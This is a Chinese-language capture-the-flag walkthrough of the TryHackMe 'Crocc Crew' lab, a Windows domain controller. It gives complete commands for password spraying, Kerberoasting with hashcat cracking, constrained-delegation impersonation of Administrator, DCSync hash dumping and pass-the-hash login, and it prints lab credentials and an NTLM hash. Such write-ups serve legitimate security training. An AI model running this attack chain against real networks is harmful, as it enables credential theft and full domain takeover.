THM-Crocc Crew

前言

THM Crocc Crew

Insane

靶机IP

10.48.160.160

扫描

nmap -p- --min-rate 3000 10.48.160.160

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
9389/tcp  open  adws
49666/tcp open  unknown
49669/tcp open  unknown
49671/tcp open  unknown
49672/tcp open  unknown
49709/tcp open  unknown
49884/tcp open  unknown

nmap -sT -sV -sC -O -p53,80,135,139,445,464,593,636,3269,3389,9389 10.48.160.160

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.COOCTUS.CORP
| Not valid before: 2026-02-18T10:03:12
|_Not valid after:  2026-08-20T10:03:12
| rdp-ntlm-info: 
|   Target_Name: COOCTUS
|   NetBIOS_Domain_Name: COOCTUS
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: COOCTUS.CORP
|   DNS_Computer_Name: DC.COOCTUS.CORP
|   Product_Version: 10.0.17763
|_  System_Time: 2026-02-19T10:13:58+00:00
|_ssl-date: 2026-02-19T10:14:37+00:00; 0s from scanner time.
9389/tcp open  mc-nmf        .NET Message Framing
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-02-19T10:14:01
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.11 seconds

dirsearch -u "http://10.48.160.160/" 

[05:13:03] 200 -   70B  - /robots.txt

• IP地址：10.48.160.160
• 主机名：DC.COOCTUS.CORP
• NetBIOS名：DC
• 域名：COOCTUS.CORP
• 操作系统：Windows Server 2019 (Build 17763)
• 服务信息：Microsoft IIS httpd 10.0
• 目录爆破：/robots.txt

Robots

User-Agent: *
Disallow:
/robots.txt
/db-config.bak
/backdoor.php

暴露路径

• /backdoor.php是假后门，无法执行命令

• /db-config.bak得到数据库凭证

  $servername = "db.cooctus.corp";
  $username = "C00ctusAdm1n";
  $password = "B4dt0th3b0n3";

RDP泄露

访问RDP，在背景上得到一组凭据

Visitor:GuestLogin!

crackmapexec smb 10.48.160.160 -u 'Visitor' -p 'GuestLogin!'

枚举

用户

crackmapexec smb 10.48.160.160 -u 'Visitor' -p 'GuestLogin!' --users
enum4linux -u 'Visitor' -p 'GuestLogin!' 10.48.160.160

收集的用户如下

password-reset
David
Ben
evan
Varg
jon
kevin
pars
yumeko
cryillic
karen
Fawaz
admCroccCrew
Howard
Steve
Spooks
Jeff
mark
Visitor
krbtgt
Guest
Administrator

密码喷洒

crackmapexec smb 10.48.160.160 -u users.txt -p 'GuestLogin!' --continue-on-success

除了Visitor均失败

AS-REP Roasting

impacket-GetNPUsers COOCTUS.CORP/ -no-pass -usersfile users.txt 

失败

共享

crackmapexec smb 10.48.160.160 -u 'Visitor' -p 'GuestLogin!' --shares

SMB         10.48.160.160   445    DC               Share           Permissions     Remark
SMB         10.48.160.160   445    DC               -----           -----------     ------
SMB         10.48.160.160   445    DC               ADMIN$                          Remote Admin
SMB         10.48.160.160   445    DC               C$                              Default share
SMB         10.48.160.160   445    DC               Home            READ            
SMB         10.48.160.160   445    DC               IPC$            READ            Remote IPC
SMB         10.48.160.160   445    DC               NETLOGON        READ            Logon server share 
SMB         10.48.160.160   445    DC               SYSVOL          READ            Logon server share 

查看共享

# 连接 Home 共享
smbclient //10.48.160.160/Home -U 'COOCTUS.CORP/Visitor%GuestLogin!'

# 连接 NETLOGON
smbclient //10.48.160.160/NETLOGON -U 'COOCTUS.CORP/Visitor%GuestLogin!'

# 连接 SYSVOL
smbclient //10.48.160.160/SYSVOL -U 'COOCTUS.CORP/Visitor%GuestLogin!'

• Home目录发现第一个flag user.txt

kerberoasting

获取SPN票据

impacket-getTGT COOCTUS.CORP/Visitor:'GuestLogin!'  # 获取 TGT
export KRB5CCNAME=Visitor.ccache                      # 设置缓存
impacket-GetUserSPNs -request -dc-ip 10.48.160.160 -k -no-pass  # 用 Kerberos 认证

破解

hashcat -m 13100 kerberoasting.hashes /usr/share/wordlists/rockyou.txt

得到新凭据

password-reset:resetpassword

BloodHound

bloodhound-python -d COOCTUS.CORP -u 'password-reset' -p 'resetpassword' -ns 10.48.160.160 -c all

上传至BloodHound

查看password-reset权限，发现对许多用户都有修改密码权限，但改不了administrator

发现password-reset对DC有委派权限

约束委派

重启了下靶机，新IP 10.48.189.67

查询

impacket-findDelegation cooctus.corp/password-reset:resetpassword -dc-ip 10.48.189.67

password-reset约束委派

• password-reset 可以代表任何用户访问 oakley 服务
• 支持协议转换（可以从非 Kerberos 认证转换）
• 可以伪造任意用户（包括域管理员）的票据访问 oakley

获取ST

impacket-getST -dc-ip 10.48.189.67 -spn oakley/DC.COOCTUS.CORP -impersonate Administrator cooctus.corp/password-reset:resetpassword

DCSync

impacket-secretsdump -k -no-pass DC.COOCTUS.CORP

evil-winrm -i 10.48.189.67 -u Administrator -H add41095f1fb0405b32f70a489de022d  

在 C:\Shares\Home 目录中,找到两个特权用户flag

在 C:\Perflogs\Admin 中，发现root.txt